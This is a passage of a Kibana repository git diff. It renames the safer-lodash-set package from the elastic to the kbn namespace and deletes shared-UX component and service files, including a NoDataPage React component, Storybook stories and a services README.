packages/elastic-safer-lodash-set/lodash/set.js rename to packages/kbn-safer-lodash-set/lodash/set.js index e911e853d64fb..aacd1edf0f50f 100644 --- a/packages/elastic-safer-lodash-set/lodash/set.js +++ b/packages/kbn-safer-lodash-set/lodash/set.js @@ -2,7 +2,7 @@ * This file is forked from the lodash project (https://lodash.com/), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ /* eslint-disable no-var */ diff --git a/packages/elastic-safer-lodash-set/lodash/setWith.js b/packages/kbn-safer-lodash-set/lodash/setWith.js similarity index 94% rename from packages/elastic-safer-lodash-set/lodash/setWith.js rename to packages/kbn-safer-lodash-set/lodash/setWith.js index 0295c9ae137d6..2bfd9dd354fde 100644 --- a/packages/elastic-safer-lodash-set/lodash/setWith.js +++ b/packages/kbn-safer-lodash-set/lodash/setWith.js @@ -2,7 +2,7 @@ * This file is forked from the lodash project (https://lodash.com/), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ /* eslint-disable no-var,eqeqeq */ diff --git a/packages/elastic-safer-lodash-set/package.json b/packages/kbn-safer-lodash-set/package.json similarity index 83% rename from packages/elastic-safer-lodash-set/package.json rename to packages/kbn-safer-lodash-set/package.json index 72b908911000d..f850b5fe0fc48 100644 --- a/packages/elastic-safer-lodash-set/package.json +++ b/packages/kbn-safer-lodash-set/package.json @@ -1,11 +1,11 @@ { - "name": "@elastic/safer-lodash-set", + "name": "@kbn/safer-lodash-set", "version": "0.0.0", "description": "A safer version of the lodash set and setWith functions", "main": "index.js", "types": "index.d.ts", "scripts": { - "lint": "../../node_modules/.bin/dependency-check --missing ../../package.json ./packages/elastic-safer-lodash-set/set.js ./packages/elastic-safer-lodash-set/setWith.js ./packages/elastic-safer-lodash-set/fp/*.js", + "lint": "../../node_modules/.bin/dependency-check --missing ../../package.json ./packages/kbn-safer-lodash-set/set.js ./packages/kbn-safer-lodash-set/setWith.js ./packages/kbn-safer-lodash-set/fp/*.js", "test": "npm run lint && ../../node_modules/.bin/tape test/*.js && npm run test:types", "test:types": "../../node_modules/.bin/tsc --noEmit", "update": "./scripts/update.sh", diff --git a/packages/elastic-safer-lodash-set/scripts/_get_lodash.sh b/packages/kbn-safer-lodash-set/scripts/_get_lodash.sh similarity index 82% rename from packages/elastic-safer-lodash-set/scripts/_get_lodash.sh rename to packages/kbn-safer-lodash-set/scripts/_get_lodash.sh index 50d3edaf34717..7fd3a056cf1f9 100755 --- a/packages/elastic-safer-lodash-set/scripts/_get_lodash.sh +++ b/packages/kbn-safer-lodash-set/scripts/_get_lodash.sh @@ -1,7 +1,7 @@ #!/usr/bin/env bash # Elasticsearch B.V licenses this file to you under the MIT License. -# See `packages/elastic-safer-lodash-set/LICENSE` for more information. +# See `packages/kbn-safer-lodash-set/LICENSE` for more information. clean_up () { exit_code=$? diff --git a/packages/elastic-safer-lodash-set/scripts/license-header.txt b/packages/kbn-safer-lodash-set/scripts/license-header.txt similarity index 74% rename from packages/elastic-safer-lodash-set/scripts/license-header.txt rename to packages/kbn-safer-lodash-set/scripts/license-header.txt index 4d0aedf74bb0f..e546841be3a2b 100644 --- a/packages/elastic-safer-lodash-set/scripts/license-header.txt +++ b/packages/kbn-safer-lodash-set/scripts/license-header.txt @@ -2,6 +2,6 @@ * This file is forked from the lodash project (https://lodash.com/), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ diff --git a/packages/elastic-safer-lodash-set/scripts/patches/_baseSet.js.patch b/packages/kbn-safer-lodash-set/scripts/patches/_baseSet.js.patch similarity index 93% rename from packages/elastic-safer-lodash-set/scripts/patches/_baseSet.js.patch rename to packages/kbn-safer-lodash-set/scripts/patches/_baseSet.js.patch index c7cf2041355d0..9a1ed2892d0d7 100644 --- a/packages/elastic-safer-lodash-set/scripts/patches/_baseSet.js.patch +++ b/packages/kbn-safer-lodash-set/scripts/patches/_baseSet.js.patch @@ -9,7 +9,7 @@ > * This file is forked from the lodash project (https://lodash.com/), > * and may include modifications made by Elasticsearch B.V. > * Elasticsearch B.V. licenses this file to you under the MIT License. -> * See `packages/elastic-safer-lodash-set/LICENSE` for more information. +> * See `packages/kbn-safer-lodash-set/LICENSE` for more information. > */ > > /* eslint-disable */ diff --git a/packages/elastic-safer-lodash-set/scripts/save_state.sh b/packages/kbn-safer-lodash-set/scripts/save_state.sh similarity index 84% rename from packages/elastic-safer-lodash-set/scripts/save_state.sh rename to packages/kbn-safer-lodash-set/scripts/save_state.sh index ead99c3d1de48..72bca0288f506 100755 --- a/packages/elastic-safer-lodash-set/scripts/save_state.sh +++ b/packages/kbn-safer-lodash-set/scripts/save_state.sh @@ -1,7 +1,7 @@ #!/usr/bin/env bash # Elasticsearch B.V licenses this file to you under the MIT License. -# See `packages/elastic-safer-lodash-set/LICENSE` for more information. +# See `packages/kbn-safer-lodash-set/LICENSE` for more information. set -e diff --git a/packages/elastic-safer-lodash-set/scripts/update.sh b/packages/kbn-safer-lodash-set/scripts/update.sh similarity index 94% rename from packages/elastic-safer-lodash-set/scripts/update.sh rename to packages/kbn-safer-lodash-set/scripts/update.sh index 58fd89eb43e33..e16b03edbe13b 100755 --- a/packages/elastic-safer-lodash-set/scripts/update.sh +++ b/packages/kbn-safer-lodash-set/scripts/update.sh @@ -1,7 +1,7 @@ #!/usr/bin/env bash # Elasticsearch B.V licenses this file to you under the MIT License. -# See `packages/elastic-safer-lodash-set/LICENSE` for more information. +# See `packages/kbn-safer-lodash-set/LICENSE` for more information. set -e diff --git a/packages/elastic-safer-lodash-set/set.d.ts b/packages/kbn-safer-lodash-set/set.d.ts similarity index 79% rename from packages/elastic-safer-lodash-set/set.d.ts rename to packages/kbn-safer-lodash-set/set.d.ts index b676d271e0556..3e5730bb1ec42 100644 --- a/packages/elastic-safer-lodash-set/set.d.ts +++ b/packages/kbn-safer-lodash-set/set.d.ts @@ -2,7 +2,7 @@ * This file is forked from the DefinitelyTyped project (https://github.com/DefinitelyTyped/DefinitelyTyped), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import { set } from '.'; diff --git a/packages/elastic-safer-lodash-set/set.js b/packages/kbn-safer-lodash-set/set.js similarity index 77% rename from packages/elastic-safer-lodash-set/set.js rename to packages/kbn-safer-lodash-set/set.js index 6977062908549..a02607a433efb 100644 --- a/packages/elastic-safer-lodash-set/set.js +++ b/packages/kbn-safer-lodash-set/set.js @@ -2,7 +2,7 @@ * This file is forked from the lodash project (https://lodash.com/), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ module.exports = require('./lodash/set'); diff --git a/packages/elastic-safer-lodash-set/setWith.d.ts b/packages/kbn-safer-lodash-set/setWith.d.ts similarity index 80% rename from packages/elastic-safer-lodash-set/setWith.d.ts rename to packages/kbn-safer-lodash-set/setWith.d.ts index 812437adc165a..20eadd898fa52 100644 --- a/packages/elastic-safer-lodash-set/setWith.d.ts +++ b/packages/kbn-safer-lodash-set/setWith.d.ts @@ -2,7 +2,7 @@ * This file is forked from the DefinitelyTyped project (https://github.com/DefinitelyTyped/DefinitelyTyped), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import { setWith } from '.'; diff --git a/packages/elastic-safer-lodash-set/setWith.js b/packages/kbn-safer-lodash-set/setWith.js similarity index 77% rename from packages/elastic-safer-lodash-set/setWith.js rename to packages/kbn-safer-lodash-set/setWith.js index aafa8a4db4be6..c957b03e349e0 100644 --- a/packages/elastic-safer-lodash-set/setWith.js +++ b/packages/kbn-safer-lodash-set/setWith.js @@ -2,7 +2,7 @@ * This file is forked from the lodash project (https://lodash.com/), * and may include modifications made by Elasticsearch B.V. * Elasticsearch B.V. licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ module.exports = require('./lodash/setWith'); diff --git a/packages/elastic-safer-lodash-set/test/fp.ts b/packages/kbn-safer-lodash-set/test/fp.ts similarity index 98% rename from packages/elastic-safer-lodash-set/test/fp.ts rename to packages/kbn-safer-lodash-set/test/fp.ts index 7a1d6601b5e26..79fda77cbd148 100644 --- a/packages/elastic-safer-lodash-set/test/fp.ts +++ b/packages/kbn-safer-lodash-set/test/fp.ts @@ -1,6 +1,6 @@ /* * Elasticsearch B.V licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import { expectType } from 'tsd'; diff --git a/packages/elastic-safer-lodash-set/test/fp_assoc.ts b/packages/kbn-safer-lodash-set/test/fp_assoc.ts similarity index 92% rename from packages/elastic-safer-lodash-set/test/fp_assoc.ts rename to packages/kbn-safer-lodash-set/test/fp_assoc.ts index 8244458cd1180..edc57bc29e8e6 100644 --- a/packages/elastic-safer-lodash-set/test/fp_assoc.ts +++ b/packages/kbn-safer-lodash-set/test/fp_assoc.ts @@ -1,6 +1,6 @@ /* * Elasticsearch B.V licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import { expectType } from 'tsd'; diff --git a/packages/elastic-safer-lodash-set/test/fp_assocPath.ts b/packages/kbn-safer-lodash-set/test/fp_assocPath.ts similarity index 93% rename from packages/elastic-safer-lodash-set/test/fp_assocPath.ts rename to packages/kbn-safer-lodash-set/test/fp_assocPath.ts index abbfa57eeb963..1dfb667fd6611 100644 --- a/packages/elastic-safer-lodash-set/test/fp_assocPath.ts +++ b/packages/kbn-safer-lodash-set/test/fp_assocPath.ts @@ -1,6 +1,6 @@ /* * Elasticsearch B.V licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import { expectType } from 'tsd'; diff --git a/packages/elastic-safer-lodash-set/test/fp_patch_test.js b/packages/kbn-safer-lodash-set/test/fp_patch_test.js similarity index 99% rename from packages/elastic-safer-lodash-set/test/fp_patch_test.js rename to packages/kbn-safer-lodash-set/test/fp_patch_test.js index 362ecf6f9d866..a7a900bd7601f 100644 --- a/packages/elastic-safer-lodash-set/test/fp_patch_test.js +++ b/packages/kbn-safer-lodash-set/test/fp_patch_test.js @@ -1,6 +1,6 @@ /* * Elasticsearch B.V licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ const test = require('tape'); diff --git a/packages/elastic-safer-lodash-set/test/fp_set.ts b/packages/kbn-safer-lodash-set/test/fp_set.ts similarity index 92% rename from packages/elastic-safer-lodash-set/test/fp_set.ts rename to packages/kbn-safer-lodash-set/test/fp_set.ts index a5dbb24d33a05..b530314b561d9 100644 --- a/packages/elastic-safer-lodash-set/test/fp_set.ts +++ b/packages/kbn-safer-lodash-set/test/fp_set.ts @@ -1,6 +1,6 @@ /* * Elasticsearch B.V licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import { expectType } from 'tsd'; diff --git a/packages/elastic-safer-lodash-set/test/fp_setWith.ts b/packages/kbn-safer-lodash-set/test/fp_setWith.ts similarity index 96% rename from packages/elastic-safer-lodash-set/test/fp_setWith.ts rename to packages/kbn-safer-lodash-set/test/fp_setWith.ts index 70a5197f72176..c86c9267e07ec 100644 --- a/packages/elastic-safer-lodash-set/test/fp_setWith.ts +++ b/packages/kbn-safer-lodash-set/test/fp_setWith.ts @@ -1,6 +1,6 @@ /* * Elasticsearch B.V licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import { expectType } from 'tsd'; diff --git a/packages/elastic-safer-lodash-set/test/index.ts b/packages/kbn-safer-lodash-set/test/index.ts similarity index 92% rename from packages/elastic-safer-lodash-set/test/index.ts rename to packages/kbn-safer-lodash-set/test/index.ts index 2090c1adcfce1..cbaefb250598c 100644 --- a/packages/elastic-safer-lodash-set/test/index.ts +++ b/packages/kbn-safer-lodash-set/test/index.ts @@ -1,6 +1,6 @@ /* * Elasticsearch B.V licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import { expectType } from 'tsd'; diff --git a/packages/elastic-safer-lodash-set/test/patch_test.js b/packages/kbn-safer-lodash-set/test/patch_test.js similarity index 98% rename from packages/elastic-safer-lodash-set/test/patch_test.js rename to packages/kbn-safer-lodash-set/test/patch_test.js index 80a44eb0c5b6b..f83cbe1e40b85 100644 --- a/packages/elastic-safer-lodash-set/test/patch_test.js +++ b/packages/kbn-safer-lodash-set/test/patch_test.js @@ -1,6 +1,6 @@ /* * Elasticsearch B.V licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ const test = require('tape'); diff --git a/packages/elastic-safer-lodash-set/test/set.ts b/packages/kbn-safer-lodash-set/test/set.ts similarity index 84% rename from packages/elastic-safer-lodash-set/test/set.ts rename to packages/kbn-safer-lodash-set/test/set.ts index 9829ac3f04ce5..b07bc407d6a8c 100644 --- a/packages/elastic-safer-lodash-set/test/set.ts +++ b/packages/kbn-safer-lodash-set/test/set.ts @@ -1,6 +1,6 @@ /* * Elasticsearch B.V licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import { expectType } from 'tsd'; diff --git a/packages/elastic-safer-lodash-set/test/setWith.ts b/packages/kbn-safer-lodash-set/test/setWith.ts similarity index 91% rename from packages/elastic-safer-lodash-set/test/setWith.ts rename to packages/kbn-safer-lodash-set/test/setWith.ts index b3ed93443c4fb..c61aa2d8ec2b1 100644 --- a/packages/elastic-safer-lodash-set/test/setWith.ts +++ b/packages/kbn-safer-lodash-set/test/setWith.ts @@ -1,6 +1,6 @@ /* * Elasticsearch B.V licenses this file to you under the MIT License. - * See `packages/elastic-safer-lodash-set/LICENSE` for more information. + * See `packages/kbn-safer-lodash-set/LICENSE` for more information. */ import { expectType } from 'tsd'; diff --git a/packages/elastic-safer-lodash-set/tsconfig.json b/packages/kbn-safer-lodash-set/tsconfig.json similarity index 100% rename from packages/elastic-safer-lodash-set/tsconfig.json rename to packages/kbn-safer-lodash-set/tsconfig.json diff --git a/packages/kbn-shared-ux-components/README.mdx b/packages/kbn-shared-ux-components/README.mdx deleted file mode 100644 index f4673a0804f31..0000000000000 --- a/packages/kbn-shared-ux-components/README.mdx +++ /dev/null @@ -1,10 +0,0 @@ ---- -id: kibSharedUXComponents -slug: /kibana-dev-docs/shared-ux/packages/kbn-shared-ux-components -title: Shared UX Components -description: -date: 2022-03-11 -tags: ['kibana', 'dev', 'sharedUX'] ---- - -> TODO diff --git a/packages/kbn-shared-ux-components/src/index.ts b/packages/kbn-shared-ux-components/src/index.ts deleted file mode 100644 index 9e11d9341fe59..0000000000000 --- a/packages/kbn-shared-ux-components/src/index.ts +++ /dev/null @@ -1,13 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -// TODO: clintandrewhall - NoDataPageProps is a temporary addition until it is split into its own package -export type { KibanaPageTemplateProps, NoDataPageProps } from './page_template'; - -// TODO: clintandrewhall - NoDataConfigPage is a temporary addition until it is split into its own package -export { KibanaPageTemplate, NoDataConfigPage } from './page_template'; diff --git a/packages/kbn-shared-ux-components/src/page_template/assets/kibana_template_no_data_config.png b/packages/kbn-shared-ux-components/src/page_template/assets/kibana_template_no_data_config.png deleted file mode 100644 index e69de29bb2d1d..0000000000000 diff --git a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/__snapshots__/no_data_config_page.test.tsx.snap b/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/__snapshots__/no_data_config_page.test.tsx.snap deleted file mode 100644 index 047f44e0d319c..0000000000000 --- a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/__snapshots__/no_data_config_page.test.tsx.snap +++ /dev/null @@ -1,31 +0,0 @@ -// Jest Snapshot v1, https://goo.gl/fbAQLP - -exports[`NoDataConfigPage renders 1`] = ` - - - -`; diff --git a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_page.tsx b/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_page.tsx deleted file mode 100644 index 724570d4baccd..0000000000000 --- a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_page.tsx +++ /dev/null @@ -1,95 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { useMemo, FunctionComponent } from 'react'; -import useObservable from 'react-use/lib/useObservable'; -import classNames from 'classnames'; - -import { EuiLink, EuiSpacer, EuiText, EuiTextColor } from '@elastic/eui'; -import { i18n } from '@kbn/i18n'; -import { FormattedMessage } from '@kbn/i18n-react'; -import { KibanaSolutionAvatar } from '@kbn/shared-ux-avatar-solution'; - -import { useSharedUxServices } from '@kbn/shared-ux-services'; -import { NoDataCard, NoDataCardProvider } from '@kbn/shared-ux-card-no-data'; -import { NoDataPageProps } from './types'; - -export const NoDataPage: FunctionComponent = ({ - solution, - logo, - action, - docsLink, - pageTitle, - ...rest -}) => { - const services = useSharedUxServices(); - - // TODO: clintandrewhall - including the `NoDataCardProvider` here is a temporary solution - // to consumers using this context to populate the NoDataPage. This will likely be removed soon, - // when NoDataPage is moved to its own package. - const currentAppId = useObservable(services.application.currentAppId$); - const noDataCardServices = { - currentAppId, - addBasePath: services.http.addBasePath, - canAccessFleet: services.permissions.canAccessFleet, - navigateToUrl: services.application.navigateToUrl, - }; - - const actionKeys = Object.keys(action); - - const actionCard = useMemo(() => { - if (actionKeys.length !== 1) { - return null; - } - const actionKey = actionKeys[0]; - const key = - actionKey === 'elasticAgent' ? 'empty-page-agent-action' : `empty-page-${actionKey}-action`; - return ; - }, [action, actionKeys]); - - const title = - pageTitle || - i18n.translate('sharedUXComponents.noDataPage.welcomeTitle', { - defaultMessage: 'Welcome to Elastic {solution}!', - values: { solution }, - }); - - return ( -
- - - -

{title}

- -

- - - - ), - }} - /> -

- - - - {actionCard} -
- ); -}; diff --git a/packages/kbn-shared-ux-components/src/page_template/page_template.stories.tsx b/packages/kbn-shared-ux-components/src/page_template/page_template.stories.tsx deleted file mode 100644 index ae6be1297f018..0000000000000 --- a/packages/kbn-shared-ux-components/src/page_template/page_template.stories.tsx +++ /dev/null @@ -1,154 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { EuiButton, EuiText } from '@elastic/eui'; -import { SolutionNavProps } from '@kbn/shared-ux-page-solution-nav'; - -import { KibanaPageTemplate } from './page_template'; -import mdx from './page_template.mdx'; -import { KibanaPageTemplateProps } from './types'; - -export default { - title: 'Page Template/Page Template', - description: - 'A thin wrapper around `EuiTemplate`. Takes care of styling, empty state and no data config', - parameters: { - docs: { - page: mdx, - }, - }, -}; - -type Params = Pick & { - canBeCollapsed: boolean; -}; - -const noDataConfig = { - solution: 'Kibana', - action: { - elasticAgent: {}, - }, - docsLink: 'http://wwww.docs.elastic.co', -}; - -const items: SolutionNavProps['items'] = [ - { - name: 'Ingest', - id: '1', - items: [ - { - name: 'Ingest Node Pipelines', - id: '1.1', - }, - { - name: 'Logstash Pipelines', - id: '1.2', - }, - { - name: 'Beats Central Management', - id: '1.3', - }, - ], - }, - { - name: 'Data', - id: '2', - items: [ - { - name: 'Index Management', - id: '2.1', - }, - { - name: 'Index Lifecycle Policies', - id: '2.2', - }, - { - name: 'Snapshot and Restore', - id: '2.3', - }, - ], - }, -]; - -const solutionNavBar = { - items, - logo: 'logoKibana', - name: 'Kibana', - action: { elasticAgent: {} }, -}; - -const content = ( - -

- Page Content goes here -

- -); - -const header = { - iconType: 'logoKibana', - pageTitle: 'Kibana', - description: 'Welcome to Kibana!', - rightSideItems: [Add something, Do something], -}; - -export const WithNoDataConfig = () => { - return ; -}; - -export const WithNoDataConfigAndSolutionNav = () => { - return ; -}; - -export const PureComponent = (params: Params) => { - return ( - - {content} - - ); -}; - -PureComponent.argTypes = { - isEmptyState: { - control: 'boolean', - defaultValue: false, - }, - pageHeader: { - control: 'boolean', - defaultValue: true, - }, - solutionNav: { - control: 'boolean', - defaultValue: true, - }, - canBeCollapsed: { - control: 'boolean', - defaultValue: true, - }, -}; - -PureComponent.parameters = { - layout: 'fullscreen', -}; - -WithNoDataConfig.parameters = { - layout: 'fullscreen', -}; - -WithNoDataConfigAndSolutionNav.parameters = { - layout: 'fullscreen', -}; diff --git a/packages/kbn-shared-ux-services/README.mdx b/packages/kbn-shared-ux-services/README.mdx deleted file mode 100755 index 589aae4cc7ed2..0000000000000 --- a/packages/kbn-shared-ux-services/README.mdx +++ /dev/null @@ -1,203 +0,0 @@ ---- -id: kibSharedUXServices -slug: /kibana-dev-docs/shared-ux/packages/kbn-shared-ux-services -title: Shared UX Services -description: The `@kbn/shared-ux-services` package provides a thin service abstraction for components and solutions created by the Shared UX team. -date: 2022-03-11 -tags: ['kibana', 'dev', 'sharedUX'] ---- - -## About Shared UX Services - -This package contains a set of services that are used by Shared UX components and solutions. This package serves as a thin abstraction layer between Kibana dependencies and the components in Shared UX that use them. It also allows us to "swap out" different implementations of the interfaces for different environments, (e.g. Storybook, Jest, etc). This decouples the components from what could be complicated or heavily-dependent logic that is difficult to mock. - -## Implementations - -Several implementations of these interfaces exist: - -- `@kbn/shared-ux-services/src/services/stub`: A stub implementation free of dependencies, (and functionality). -- `@kbn/shared-ux-services/src/services/mock`: A Jest mock implementation used in `jest` tests. -- `@kbn/shared-ux-storybook/src/services/`: A Storybook implementation used in Storybook decorators and stories. -- `src/plugins/shared_ux/src/services/`: A Kibana implementation used in Kibana plugins. - -Other implementations could easily be written to support other environments. - -## Architecture - -Lots of components require access to the services provided by other plugins. When we identify a routine that relies on these dependencies, we can write a new method and add it to a namespace, (e.g. `platform`, `user`, etc). These namespaces become interfaces of simple methods stored in `@kbn/shared-ux-services`. From there, we can create implementations for each environment we support. - -Suppose we're creating a new service, `SharedUxFooService`: - -```ts -interface SharedUxFooService { - getFoo(): string; - setBar(bar: string): void; - isBaz(): boolean; -} -``` - -Once defined, we create factories to create those services. - -### Creating a `ServiceFactory` - -A `ServiceFactory` is a simple type that describes 1/ what service is being created, and 2/ what parameters are required to create that service for a given environment. - -### Stub and Mock Factories - -Given the service definition above, we can create a `ServiceFactory` for a stubbed service that gives the bare minimum of functionality: - -```ts -/** - * A factory function for creating a stubbed implementation of `SharedUxFooService`. - */ -export type FooServiceFactory = ServiceFactory; - -/** - * A factory function for creating a stubbed implementation of `SharedUxFooService`. - */ -export const fooServiceFactory: FooServiceFactory = () => ({ - getFoo: () => 'foo', - setBar: () => {}, - isBaz: () => false, -}); -``` - -We can also create a mock for Jest: - -```ts -/** - * A factory function for creating a mock implementation of `SharedUxFooService`. - */ -export type FooServiceFactory = ServiceFactory; - -/** - * A factory function for creating a stubbed implementation of `SharedUxFooService`. - */ -export const fooServiceFactory: FooServiceFactory = () => ({ - getFoo: () => jest.fn(), - setBar: () => jest.fn(), - isBaz: () => jest.fn(), -}); -``` - -### Storybook Factories - -Storybook is where we can begin to take advantage of `Parameters` for a given service. Since stories can use controls to provide parameters, we can create a `ServiceFactory` that uses the `Parameters` generic and returns a `SharedUxFooService` that uses their values. - -```ts -import { action } from '@storybook/addon-actions'; - -interface FooServiceStorybookParameters { - foo: string; - baz: boolean; -} - -/** - * A factory function for creating a Storybook implementation of `SharedUxFooService`. - */ -export type FooServiceFactory = ServiceFactory; - -/** - * A factory function for creating a stubbed implementation of `SharedUxFooService`. - */ -export const fooServiceFactory: FooServiceFactory = ({ foo, baz }) => ({ - getFoo: () => foo, - setBar: () => action('setBar'), - isBaz: () => baz, -}); -``` - -A story can then optionally provide values for those parameters as part of its controls. - -```ts -type Params = Pick; - -export const ComponentStory = ({ foo }: Params) => { - const service = fooServiceFactory({ foo, baz: false }); - - return ( - ; -}; - -PureComponent.argTypes = { - foo: { - options: ['alpha', 'beta', 'gamma', 'delta'], - control: { type: 'radio' }, - }, -}; -``` - -### Kibana Factories - -Using these services in Kibana is a bit more complex, but is still relatively simple. First, we define what dependencies we'll need, (we use this interface in `src/plugins/shared_ux` as it relies on types found only in plugins, where packages cannot use them): - -```ts -/** - * Parameters necessary to create a Kibana-based service, (e.g. during Plugin - * startup or setup). - * - * The `Start` generic refers to the specific Plugin `TPluginsStart`. - */ -export interface KibanaPluginServiceParams { - coreStart: CoreStart; - startPlugins: Start; - appUpdater?: BehaviorSubject; - initContext?: PluginInitializerContext; -} - -/** - * A factory function for creating a Kibana-based service. - * - * The `Service` generic determines the shape of the Service being produced. - * The `Start` generic refers to the specific Plugin `TPluginsStart`. - */ -export type KibanaPluginServiceFactory = ( - params: KibanaPluginServiceParams -) => Service; -``` - -From there, a plugin might have a collection of dependencies on core or other plugins: - -```ts -export interface MyPluginStartDeps { - bar: BarPluginStart; - baz: BazPluginStart; -} -``` - -We'd then use this dependency interface to create a `ServiceFactory` for our service in Kibana: - -```ts -export type FooServiceFactory = KibanaPluginServiceFactory< - SharedUxFooService, - MyPluginStartDeps ->; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUxFooService`. - */ -export const fooServiceFactory: FooServiceFactory = ({ coreStart, startPlugins }) => ({ - getFoo: startPlugins.bar.getSomeOtherFoo, - setBar: startPlugins.baz.setHappyPathBar, - isBaz: () => { - return coreStart.uiSettings.get('someSetting') === 'expectedValue'; - } -}); -``` - -From there, the pattern is the same: invoke the service factory with the required dependencies and provide them to the `SharedUxServicesContext` Provider: - -```ts - -// plugin.tsx -public start(coreStart: CoreStart, startPlugins: SharedUXPluginStartDeps): SharedUXPluginStart { - const fooService = fooServiceFactory({ coreStart, startPlugins }); - const Context = {children}; - - // ...wrap React content with the context.. -} -``` - -## Use in Kibana plugins - -In order to make consumption of these services easy by Kibana plugins, `src/plugins/shared_ux` provides a pre-wired set of services as part of the `start` lifecycle. Plugins can simply make `sharedUX` a dependency, import `SharedUxServicesProvider` and wrap their solution root (or any component). See the documentation for `sharedUX` for more details. diff --git a/packages/kbn-shared-ux-services/src/context.tsx b/packages/kbn-shared-ux-services/src/context.tsx deleted file mode 100644 index 6131c23e27370..0000000000000 --- a/packages/kbn-shared-ux-services/src/context.tsx +++ /dev/null @@ -1,70 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { FC, createContext, useContext } from 'react'; - -import type { SharedUxServices } from './types'; - -// The React Context used to provide the services to the SharedUX components. -const SharedUxServicesContext = createContext(null); - -/** - * The `React.Context` Provider component for the `SharedUxServices` context. Any - * plugin or environment that consumes SharedUX components needs to wrap their React - * tree with this provider. - * - * Within a plugin, you can use use the Shared UX plugin and retrieve a fully-configured - * context from the `start` contract. - */ -export const SharedUxServicesProvider: FC = ({ children, ...services }) => ( - {children} -); - -/** - * React hook for accessing pre-wired `SharedUxServices`. - */ -export function useSharedUxServices() { - const context = useContext(SharedUxServicesContext); - - if (!context) { - throw new Error( - 'SharedUxServicesContext missing. Ensure your component or React root is wrapped with SharedUxServicesProvider.' - ); - } - - return context; -} - -/** - * React hook for accessing the pre-wired `SharedUxPlatformService`. - */ -export const usePlatformService = () => useSharedUxServices().platform; - -/** - * React hook for accessing the pre-wired `SharedUxPermissionsService`. - */ -export const usePermissions = () => useSharedUxServices().permissions; - -/** - * React hook for accessing the pre-wired `SharedUxEditorsService`. - */ -export const useEditors = () => useSharedUxServices().editors; - -/** - * React hook for accessing the pre-wired `SharedUxDocLinksService`. - */ -export const useDocLinks = () => useSharedUxServices().docLinks; - -export const useHttp = () => useSharedUxServices().http; - -export const useApplication = () => useSharedUxServices().application; - -/** - * React hook for accessing the pre-wired `SharedUxDataService`. - */ -export const useData = () => useSharedUxServices().data; diff --git a/packages/kbn-shared-ux-services/src/index.ts 